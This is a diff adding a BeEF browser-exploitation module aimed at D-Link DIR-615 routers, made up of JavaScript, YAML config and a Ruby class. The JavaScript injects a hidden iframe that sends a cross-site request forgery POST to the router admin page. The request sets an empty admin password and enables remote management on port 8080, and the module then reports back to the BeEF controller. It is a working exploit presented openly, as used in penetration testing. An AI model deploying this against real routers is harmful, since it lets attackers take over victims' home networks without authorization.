diff --git a/modules/exploits/router/dlink_dir_615_wipe_passwd/command.js b/modules/exploits/router/dlink_dir_615_wipe_passwd/command.js new file mode 100644 index 000000000..2dc496f3a --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_wipe_passwd/command.js @@ -0,0 +1,39 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var gateway = '<%= @base %>'; + + var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", + [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , + {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, + {'type':'hidden', 'name':'admin_name', 'value':'admin'}, + {'type':'hidden', 'name':'admin_password1', 'value':''}, + {'type':'hidden', 'name':'admin_password2', 'value':''}, + {'type':'hidden', 'name':'rt_enable', 'value':'on'}, + {'type':'hidden', 'name':'rt_enable_h', 'value':'1'}, + {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'}, + {'type':'hidden', 'name':'rt_port', 'value':'8080'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(dir615_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml b/modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml new file mode 100644 index 000000000..f423bbe28 --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + dlink_dir_615_wipe_passwd: + enable: true + category: ["Exploits", "Router"] + name: "D-Link DIR-615 Password Wipe" + description: "Attempts to wipe the password of the admin user on a D-Link DIR-615 router." + authors: ["antisnatchor"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb b/modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb new file mode 100644 index 000000000..5d737de2e --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb @@ -0,0 +1,28 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Dlink_dir_615_wipe_passwd < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end